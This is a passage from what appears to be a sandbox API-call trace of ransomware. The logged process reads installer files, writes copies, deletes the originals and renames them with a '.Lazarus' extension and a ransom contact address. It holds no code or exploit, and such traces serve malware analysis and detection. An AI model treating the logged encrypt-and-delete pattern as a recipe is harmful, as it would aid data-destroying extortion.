out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.194] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.195] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0077.196] ReadFile (in: hFile=0x428, lpBuffer=0x88b38, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x88b38*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0077.196] WriteFile (in: hFile=0x42c, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0077.197] CloseHandle (hObject=0x42c) returned 1 [0077.370] CloseHandle (hObject=0x428) returned 1 [0077.370] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0077.378] GetFileType (hFile=0x428) returned 0x1 [0077.378] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0077.378] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x88b38 [0077.378] GetLastError () returned 0xb7 [0077.378] SetLastError (dwErrCode=0xb7) [0077.378] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0077.379] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88b38 | out: hHeap=0x20000) returned 1 [0077.379] CloseHandle (hObject=0x428) returned 1 [0077.379] AreFileApisANSI () returned 1 [0077.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0077.379] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0077.379] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e2d0, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi") returned 45 [0077.379] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x64.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x64.msi")) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a6f8 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6a8 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x92460 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8bf40 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0077.380] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0077.381] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.381] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.381] FindNextFileW (in: hFindFile=0x78950, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x1, dwReserved1=0x0, cFileName="netfx_Extended_x86.msi", cAlternateFileName="NETFX_~4.MSI")) returned 1 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ddc8 | out: hHeap=0x20000) returned 1 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0077.381] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.381] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0077.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0077.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0077.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0077.382] AreFileApisANSI () returned 1 [0077.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi", lpUsedDefaultChar=0x0) returned 45 [0077.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0077.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.382] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0077.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0077.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0077.382] AreFileApisANSI () returned 1 [0077.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0077.382] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71a30 [0077.382] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71a30, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0077.382] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0077.382] GetFileType (hFile=0x428) returned 0x1 [0077.382] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0077.383] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0077.383] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0077.383] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0077.383] CloseHandle (hObject=0x428) returned 1 [0077.383] AreFileApisANSI () returned 1 [0077.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0077.383] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0077.383] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0077.383] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0077.383] GetFileType (hFile=0x428) returned 0x1 [0077.383] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0077.384] CloseHandle (hObject=0x428) returned 1 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0077.384] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0077.384] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0077.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0077.385] AreFileApisANSI () returned 1 [0077.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b00 [0077.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4dea8, cbMultiByte=-1, lpWideCharStr=0x71b00, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0077.385] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x7626f700, ftCreationTime.dwHighDateTime=0x1cac6f6, ftLastAccessTime.dwLowDateTime=0x7626f700, ftLastAccessTime.dwHighDateTime=0x1cac6f6, ftLastWriteTime.dwLowDateTime=0x7626f700, ftLastWriteTime.dwHighDateTime=0x1cac6f6, nFileSizeHigh=0x0, nFileSizeLow=0x79000)) returned 1 [0077.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0077.385] AreFileApisANSI () returned 1 [0077.385] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0077.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0077.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0077.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0077.385] GetLastError () returned 0x0 [0077.385] SetLastError (dwErrCode=0x0) [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e0a0 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x92460 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8bf40 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d5b8 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0077.385] GetLastError () returned 0x0 [0077.385] SetLastError (dwErrCode=0x0) [0077.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71758 [0077.385] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0077.385] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x8ab20 [0077.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71758 | out: hHeap=0x20000) returned 1 [0077.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0077.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0077.386] AreFileApisANSI () returned 1 [0077.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0077.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0077.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x8ab20, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0077.386] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0077.386] GetFileType (hFile=0x428) returned 0x1 [0077.386] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0077.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0077.386] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0077.387] AreFileApisANSI () returned 1 [0077.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0077.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71b68 [0077.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi") returned 45 [0077.387] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\netfx_Extended_x86.msi" (normalized: "c:\\588bce7c90097ed212\\netfx_extended_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0077.387] GetFileType (hFile=0x42c) returned 0x1 [0077.387] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0077.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a3b0 [0077.387] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0077.387] 